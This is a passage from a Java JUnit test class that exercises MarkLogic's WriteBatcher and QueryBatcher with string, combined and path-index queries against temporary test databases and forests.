= getRestAppServerHostName(); restServerName = getRestAppServerName(); // Points to top level of all QA data folder dataConfigDirPath = getDataConfigDirPath(); setupJavaRESTServer(dbName, fNames[0], restServerName, restServerPort); setupAppServicesConstraint(dbName); createUserRolesWithPrevilages("test-eval","xdbc:eval", "xdbc:eval-in","xdmp:eval-in","any-uri","xdbc:invoke"); createRESTUser("eval-user", "x", "test-eval","rest-admin","rest-writer","rest-reader","rest-extension-user","manage-user"); // For use with Java/REST Client API client = DatabaseClientFactory.newClient(restServerHost, restServerPort, "admin", "admin", Authentication.DIGEST); dmManager = client.newDataMovementManager(); // For use with QueryHostBatcher clientQHB = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); moveMgr = clientQHB.newDataMovementManager(); } /** * @throws java.lang.Exception */ @AfterClass public static void tearDownAfterClass() throws Exception { System.out.println("In tearDownAfterClass"); // Release clients client.release(); clientQHB.release(); associateRESTServerWithDB(restServerName, "Documents" ); deleteRESTUser("eval-user"); detachForest(dbName, fNames[0]); deleteDB(dbName); deleteForest(fNames[0]); } /** * @throws java.lang.Exception */ @Before public void setUp() throws Exception { System.out.println("In setup"); } /** * @throws java.lang.Exception */ @After public void tearDown() throws Exception { System.out.println("In tearDown"); clearDB(restServerPort); } /* * To test String query with Document Manager (Java Client API write method) and WriteBatcher. * @throws IOException * @throws ParserConfigurationException * @throws SAXException * @throws XpathException */ @Test public void testAndWordQuery() throws IOException, ParserConfigurationException, SAXException, InterruptedException { System.out.println("Running testAndWordQuery"); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; String queryOptionName = "absRangeConstraintWithVariousGrammarAndWordQueryOpt.xml"; try { // write docs using Java Client API for (String filename : filenames) { writeDocumentUsingInputStreamHandle(client, filename, "/abs-range-constraint/", "XML"); } setQueryOption(client, queryOptionName); QueryManager queryMgr = client.newQueryManager(); // create query def StringQueryDefinition querydef = queryMgr.newStringDefinition(queryOptionName); querydef.setCriteria("(pop:high OR pop:medium) AND price:medium AND intitle:served"); // create handle to search using Java Client API. JacksonHandle jh = new JacksonHandle(); JsonNode jsonResults = queryMgr.search(querydef, jh).get(); // Verify the results. JsonNode searchResult = jsonResults.get("results").get(0); assertEquals(1, searchResult.get("index").asInt()); assertEquals("/abs-range-constraint/constraint4.xml", searchResult.get("uri").asText()); String contents = searchResult.get("content").asText(); assertTrue("Expected String not available", contents.contains("Vannevar served")); assertTrue("Expected amt not available", contents.contains("12.34")); // Clear the database. clearDB(8000); //Use WriteBatcher to write the same files. WriteBatcher batcher = dmManager.newWriteBatcher(); // Move to individual data sub folders. String dataFileDir = dataConfigDirPath + "/data/"; batcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); batcher.add("/abs-range-constraint/batcher-contraints1.xml", contentHandle1); batcher.add("/abs-range-constraint/batcher-contraints2.xml", contentHandle2); batcher.add("/abs-range-constraint/batcher-contraints3.xml", contentHandle3); batcher.add("/abs-range-constraint/batcher-contraints4.xml", contentHandle4); batcher.add("/abs-range-constraint/batcher-contraints5.xml", contentHandle5); // Verify if the batch flushes when batch size is reached. // Flush batcher.flushAndWait(); // Hold for asserting the callbacks batch contents, since callback are on different threads than the main JUnit thread. // JUnit can not assert on different threads; other than the main one. StringBuilder batchResults = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch -> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); } batchResults.append(batch.getForest().getForestName()) .append('|') .append(batch.getJobBatchNumber()) .append('|'); }); queryBatcher1.onQueryFailure(throwable -> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); }); JobTicket jobTicket = dmManager.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertTrue("URI returned not correct", res[0].contains("/abs-range-constraint/batcher-contraints4.xml")); //Verify Fores Name. assertTrue("Forest name not correct", res[2].contains(fNames[0])); } } catch(Exception e) { System.out.print(e.getMessage()); } finally { } } /* * To test String query with multiple forests. * @throws Exception * */ @Test public void testAndWordQueryWithMultipleForests() throws Exception { String testMultipleDB = "QBMultipleForestDB"; String[] testMultipleForest = {"QBMultipleForestDB-1", "QBMultipleForestDB-2", "QBMultipleForestDB-3"}; DatabaseClient clientTmp = null; DataMovementManager dmManagerTmp = null; try { System.out.println("Running testAndWordQueryWithMultipleForests"); //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); createForest(testMultipleForest[1], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); setupAppServicesConstraint(testMultipleDB); Thread.sleep(10000); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; String queryOptionName = "absRangeConstraintWithVariousGrammarAndWordQueryOpt.xml"; clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); dmManagerTmp = clientTmp.newDataMovementManager(); setQueryOption(clientTmp, queryOptionName); QueryManager queryMgr = clientTmp.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("0012"); // Move to individual data sub folders. String dataFileDir = dataConfigDirPath + "/data/"; //Use WriteBatcher to write the same files. WriteBatcher batcher = dmManagerTmp.newWriteBatcher(); batcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); batcher.add("/abs-range-constraint/batcher-contraints1.xml", contentHandle1); batcher.add("/abs-range-constraint/batcher-contraints2.xml", contentHandle2); batcher.add("/abs-range-constraint/batcher-contraints3.xml", contentHandle3); batcher.add("/abs-range-constraint/batcher-contraints4.xml", contentHandle4); batcher.add("/abs-range-constraint/batcher-contraints5.xml", contentHandle5); // Verify if the batch flushes when batch size is reached. // Flush batcher.flushAndWait(); // Hold for asserting the callbacks batch contents, since callback are on different threads than the main JUnit thread. // JUnit can not assert on different threads; other than the main one. StringBuilder batchResults = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertEquals("Number of reults returned is incorrect", 1, res.length); assertTrue("URI returned not correct", res[0].contains("/abs-range-constraint/batcher-contraints2.xml")); } } catch (Exception e) { System.out.println("Exceptions thrown from Test testAndWordQueryWithMultipleForests"); System.out.println(e.getMessage()); } finally { // Associate back the original DB. associateRESTServerWithDB(restServerName, dbName); detachForest(testMultipleDB, testMultipleForest[0]); detachForest(testMultipleDB, testMultipleForest[1]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); deleteForest(testMultipleForest[1]); Thread.sleep(10000); clientTmp.release(); } } /* * To test query by example with WriteBatcher and QueryBatcher. * @throws IOException * @throws InterruptedException */ /*public void testQueryByExample() throws IOException, InterruptedException { System.out.println("Running testQueryByExample"); String[] filenames = {"constraint1.json", "constraint2.json", "constraint3.json", "constraint4.json", "constraint5.json"}; WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); StringBuffer writebatchResults = new StringBuffer(); batcher.add("/batcher-contraints1.json", contentHandle1); batcher.add("/batcher-contraints2.json", contentHandle2); batcher.add("/batcher-contraints3.json", contentHandle3); batcher.add("/batcher-contraints4.json", contentHandle4); batcher.add("/batcher-contraints5.json", contentHandle5); // Flush batcher.flushAndWait(); StringBuilder querybatchResults = new StringBuilder(); StringBuilder querybatchFailResults = new StringBuilder(); // get the query File file = new File(dataConfigDirPath + "qbe1.json"); FileHandle fileHandle = new FileHandle(file); QueryManager queryMgr = client.newQueryManager(); RawQueryByExampleDefinition qbyexDef = queryMgr.newRawQueryByExampleDefinition(fileHandle.withFormat(Format.JSON)); // Run a QueryBatcher. QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(qbyexDef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { querybatchResults.append(str) .append('|'); } querybatchResults.append(batch.getJobResultsSoFar()) .append('|') .append(batch.getForest().getForestName()) .append('|') .append(batch.getJobBatchNumber()) .append('|'); }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); querybatchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManager.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitTermination(30, TimeUnit.SECONDS); if (queryBatcher1.isStopped()) { if (!querybatchFailResults.toString().isEmpty() && querybatchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = querybatchResults.toString().split("\\|"); assertTrue("URI returned not correct", res[0].contains("/batcher-contraints1.json")); assertEquals("Bytes Moved","0", res[1]); assertEquals("Batch Number","0", res[3]); } }*/ /* * To test that RawStructuredQueryDefinition can be mixed in with a StructuredQueryBuilder * @throws Exception * * TODO modify this test for Git 591, once 591 is fixed/addressed. * */ @Ignore public void testRawStructuredQDWithQueryBuilder() throws Exception { String testMultipleDB = "RawStrutdQDWithQBuilderDB"; String[] testMultipleForest = {"RawStrutdQDWithQBuilderDB-1", "RawStrutdQDWithQBuilderDB-2", "RawStrutdQDWithQBuilderDB-3"}; DatabaseClient clientTmp = null; DataMovementManager dmManagerTmp = null; FileWriter writer = null; BufferedReader UriReaderTxt = null; FileReader freader = null; String fileName = "RawStrutdQDWithQBuilderDB.txt"; try { System.out.println("Running testRawStructuredQDWithQueryBuilder"); //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); createForest(testMultipleForest[1], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); setupAppServicesConstraint(testMultipleDB); Thread.sleep(10000); String[] filenames = {"curbappeal.xml", "flipper.xml", "justintime.xml"}; clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); dmManagerTmp = clientTmp.newDataMovementManager(); QueryManager queryMgr = clientTmp.newQueryManager(); String dataFileDir = dataConfigDirPath + "/data/"; //Use WriteBatcher to write the same files. WriteBatcher wbatcher = dmManagerTmp.newWriteBatcher(); wbatcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); wbatcher.add(filenames[0], contentHandle1); wbatcher.add(filenames[1], contentHandle2); wbatcher.add(filenames[2], contentHandle3); // Verify if the batch flushes when batch size is reached. // Flush wbatcher.flushAndWait(); wbatcher.awaitCompletion(); StructuredQueryBuilder qb = queryMgr.newStructuredQueryBuilder(); String options = "<options xmlns=\"http://marklogic.com/appservices/search\">" + "<constraint name='industry'>"+ "<value>"+ "<element name='industry' ns=''/>"+ "</value>"+ "</constraint>"+ "</options>"; RawStructuredQueryDefinition rsq = qb.build(qb.term("neighborhoods"), qb.valueConstraint("industry", "Real Estate")); String comboquery = "<search xmlns=\"http://marklogic.com/appservices/search\">" + rsq.toString() + options + "</search>"; RawCombinedQueryDefinition querydef = queryMgr.newRawCombinedQueryDefinition((new StringHandle(comboquery)).withFormat(Format.XML)); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); queryBatcher1.withBatchSize(1); writer = new FileWriter(fileName); queryBatcher1.onUrisReady(new UrisToWriterListener(writer)) .onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); writer.flush(); if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. freader = new FileReader(fileName); UriReaderTxt = new BufferedReader(freader); TreeMap<String, String> expectedMap = new TreeMap<String, String>(); TreeMap<String, String> uriMap = new TreeMap<String, String>(); expectedMap.put(filenames[0], "URI"); expectedMap.put(filenames[1], "URI"); String line = null; while ((line = UriReaderTxt.readLine()) != null) { System.out.println("Line read from file with URIS is" + line); uriMap.put(line, "URI"); } assertTrue("URIs not read correctly from testRawStructuredQDWithQueryBuilder method ", expectedMap.equals(uriMap)); } catch (Exception e) { System.out.println("Exceptions thrown from Test testRawStructuredQDWithQueryBuilder"); System.out.println(e.getMessage()); } finally { // Associate back the original DB. associateRESTServerWithDB(restServerName, dbName); detachForest(testMultipleDB, testMultipleForest[0]); detachForest(testMultipleDB, testMultipleForest[1]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); deleteForest(testMultipleForest[1]); Thread.sleep(10000); try { if (writer != null) writer.close(); if (UriReaderTxt != null) UriReaderTxt.close(); if (freader != null) freader.close(); // Delete the file on JVM exit File file = new File(fileName); file.deleteOnExit(); } catch (Exception e) { // TODO Auto-generated catch block e.printStackTrace(); } clientTmp.release(); } } /* * To test that RawStructuredQueryDefinition can be used withQueryBatcher * Store options from a file to server. * Read a query from a file into a handle * Create a RawCombinedQueryDefinition from handle and options, to be used in QueryBatcher Job. * * @throws Exception * */ @Test public void testRawCombinedQueryXMLWithWriteOptions() throws Exception { String testMultipleDB = "RawCombinedQueryXMLDB"; String[] testMultipleForest = {"RawCombinedQueryXMLDB-1", "RawCombinedQueryXMLDB-2", "RawCombinedQueryXMLDB-3"}; DatabaseClient clientTmp = null; DataMovementManager dmManagerTmp = null; try { System.out.println("Running testRawCombinedQueryXMLWithWriteOptions"); //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); createForest(testMultipleForest[1], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); setupAppServicesConstraint(testMultipleDB); Thread.sleep(10000); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; String queryOptionFileName = "valueConstraintWithoutIndexSettingsAndNSOpt.xml"; String queryName = "combinedQueryNoOption.xml"; clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); dmManagerTmp = clientTmp.newDataMovementManager(); QueryManager queryMgr = clientTmp.newQueryManager(); String dataFileDir = dataConfigDirPath + "/data/"; String combQueryFileDir = dataConfigDirPath + "/combined/"; //Use WriteBatcher to write the same files. WriteBatcher wbatcher = dmManagerTmp.newWriteBatcher(); wbatcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); wbatcher.add(filenames[0], contentHandle1); wbatcher.add(filenames[1], contentHandle2); wbatcher.add(filenames[2], contentHandle3); wbatcher.add(filenames[3], contentHandle4); wbatcher.add(filenames[4], contentHandle5); // Verify if the batch flushes when batch size is reached. // Flush wbatcher.flushAndWait(); wbatcher.awaitCompletion(); setQueryOption(clientTmp, queryOptionFileName); // get the combined query File file = new File(combQueryFileDir+queryName); // create a handle for the search criteria FileHandle rawHandle = (new FileHandle(file)).withFormat(Format.XML); // create a search definition based on the handle RawCombinedQueryDefinition querydef = queryMgr.newRawCombinedQueryDefinition(rawHandle, queryOptionFileName); StringBuilder batchResults = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertEquals("Number of reults returned is incorrect", 1, res.length); assertTrue("URI returned not correct", res[0].contains(filenames[4])); // Read the document and assert on the value DOMHandle contentHandle = new DOMHandle(); contentHandle = readDocumentUsingDOMHandle(clientTmp, filenames[4], "XML"); Document readDoc = contentHandle.get(); System.out.println(convertXMLDocumentToString(readDoc)); assertTrue("Document content returned not correct", readDoc.getElementsByTagName("id").item(0).getTextContent().contains("0026")); assertTrue("Document content returned not correct", readDoc.getElementsByTagName("title").item(0).getTextContent().contains("The memex")); assertTrue("Document content returned not correct", readDoc.getElementsByTagName("date").item(0).getTextContent().contains("2009-05-05")); } } catch (Exception e) { System.out.println("Exceptions thrown from testRawCombinedQueryXMLWithWriteOptions"); System.out.println(e.getMessage()); } finally { // Associate back the original DB. associateRESTServerWithDB(restServerName, dbName); detachForest(testMultipleDB, testMultipleForest[0]); detachForest(testMultipleDB, testMultipleForest[1]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); deleteForest(testMultipleForest[1]); Thread.sleep(10000); clientTmp.release(); } } /* * To test that RawStructuredQueryDefinition can be used withQueryBatcher - JSON file * Read a query from a combined file into a handle. combinedQueryOptionJSON.json contains query, options in JSON format. * @throws Exception * */ @Test public void testRawCombinedQueryJSON() throws Exception { String testMultipleDB = "RawCombinedRangeJsonDB"; String[] testMultipleForest = {"RawCombinedRangeJsonDB-1", "RawCombinedRangeJsonDB-2", "RawCombinedRangeJsonDB-3"}; DatabaseClient clientTmp = null; DataMovementManager dmManagerTmp = null; try { System.out.println("Running testRawCombinedQueryJSON"); //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); createForest(testMultipleForest[1], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); setupAppServicesConstraint(testMultipleDB); Thread.sleep(10000); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; String combinedQueryFileName = "combinedQueryOptionJSON.json"; clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); dmManagerTmp = clientTmp.newDataMovementManager(); QueryManager queryMgr = clientTmp.newQueryManager(); String dataFileDir = dataConfigDirPath + "/data/"; String combQueryFileDir = dataConfigDirPath + "/combined/"; //Use WriteBatcher to write the same files. WriteBatcher wbatcher = dmManagerTmp.newWriteBatcher(); wbatcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); wbatcher.add(filenames[0], contentHandle1); wbatcher.add(filenames[1], contentHandle2); wbatcher.add(filenames[2], contentHandle3); wbatcher.add(filenames[3], contentHandle4); wbatcher.add(filenames[4], contentHandle5); // Verify if the batch flushes when batch size is reached. // Flush wbatcher.flushAndWait(); wbatcher.awaitCompletion(); // get the combined query File file = new File(combQueryFileDir+combinedQueryFileName); // create a handle for the search criteria FileHandle rawHandle = (new FileHandle(file)).withFormat(Format.JSON); // create a search definition based on the handle RawCombinedQueryDefinition querydef = queryMgr.newRawCombinedQueryDefinition(rawHandle); StringBuilder batchResults = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertEquals("Number of reults returned is incorrect", 1, res.length); assertTrue("URI returned not correct", res[0].contains(filenames[4])); // Read the document and assert on the value DOMHandle contentHandle = new DOMHandle(); contentHandle = readDocumentUsingDOMHandle(clientTmp, filenames[4], "XML"); Document readDoc = contentHandle.get(); System.out.println(convertXMLDocumentToString(readDoc)); assertTrue("Document content returned not correct", readDoc.getElementsByTagName("id").item(0).getTextContent().contains("0026")); assertTrue("Document content returned not correct", readDoc.getElementsByTagName("title").item(0).getTextContent().contains("The memex")); assertTrue("Document content returned not correct", readDoc.getElementsByTagName("date").item(0).getTextContent().contains("2009-05-05")); } } catch (Exception e) { System.out.println("Exceptions thrown from testRawCombinedQueryJSONWithWriteOptions"); System.out.println(e.getMessage()); } finally { // Associate back the original DB. associateRESTServerWithDB(restServerName, dbName); detachForest(testMultipleDB, testMultipleForest[0]); detachForest(testMultipleDB, testMultipleForest[1]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); deleteForest(testMultipleForest[1]); Thread.sleep(10000); clientTmp.release(); } } /* * To test that RawStructuredQueryDefinition can be used withQueryBatcher - Combined file * Read a query from a combined file into a handle. * Create a RawCombinedQueryDefinition from handle, to be used in QueryBatcher Job. * * @throws Exception * */ @Test public void testRawCombinedQueryPathIndex() throws Exception { String testMultipleDB = "RawCombinedRangePathDB"; String[] testMultipleForest = {"RawCombinedRangePathDB-1", "RawCombinedRangePathDB-2", "RawCombinedRangePathDB-3"}; DatabaseClient clientTmp = null; DataMovementManager dmManagerTmp = null; try { System.out.println("Running testRawCombinedQueryPathIndex"); //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); createForest(testMultipleForest[1], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); setupAppServicesConstraint(testMultipleDB); Thread.sleep(10000); String[] filenames = {"pathindex1.xml", "pathindex2.xml"}; String combinedQueryFileName = "combinedQueryOptionPathIndex.xml"; clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); dmManagerTmp = clientTmp.newDataMovementManager(); QueryManager queryMgr = clientTmp.newQueryManager(); String dataFileDir = dataConfigDirPath + "/data/"; String combQueryFileDir = dataConfigDirPath + "/combined/"; //Use WriteBatcher to write the same files. WriteBatcher wbatcher = dmManagerTmp.newWriteBatcher(); wbatcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); wbatcher.add(filenames[0], contentHandle1); wbatcher.add(filenames[1], contentHandle2); // Verify if the batch flushes when batch size is reached. // Flush wbatcher.flushAndWait(); wbatcher.awaitCompletion(); // get the combined query File file = new File(combQueryFileDir+combinedQueryFileName); // create a handle for the search criteria FileHandle rawHandle = new FileHandle(file); rawHandle.withFormat(Format.XML); // create a search definition based on the handle RawCombinedQueryDefinition querydef = queryMgr.newRawCombinedQueryDefinition(rawHandle); StringBuilder batchResults = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertEquals("Number of reults returned is incorrect", 2, res.length); assertTrue("URI returned not correct", res[0].contains("pathindex1.xml")?true:(res[1].contains("pathindex1.xml")?true:false)); assertTrue("URI returned not correct", res[0].contains("pathindex2.xml")?true:(res[1].contains("pathindex2.xml")?true:false)); } } catch (Exception e) { System.out.println("Exceptions thrown from testRawCombinedQueryPathIndex"); System.out.println(e.getMessage()); } finally { // Associate back the original DB. associateRESTServerWithDB(restServerName, dbName); detachForest(testMultipleDB, testMultipleForest[0]); detachForest(testMultipleDB, testMultipleForest[1]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); deleteForest(testMultipleForest[1]); Thread.sleep(10000); clientTmp.release(); } } /* * To test query by example with WriteBatcher and QueryBatcher * with Query Failure (incorrect query syntax). * * @throws IOException * @throws InterruptedException */ // EA 3 Modify the test for batch failure results. Remove the fail. @Ignore public void testQueryBatcherQueryFailures() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherQueryFailures"); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(2); // Move to individual data sub folders. String dataFileDir = dataConfigDirPath + "/data/"; InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); batcher.add("/fail-contraints1.xml", contentHandle1); batcher.add("/fail-contraints2.xml", contentHandle2); batcher.add("/fail-contraints3.xml", contentHandle3); batcher.add("/fail-contraints4.xml", contentHandle4); batcher.add("/fail-contraints5.xml", contentHandle5); // Flush batcher.flushAndWait(); StringBuilder batchResults = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // create query def String combinedQuery = "{\"search\":" + 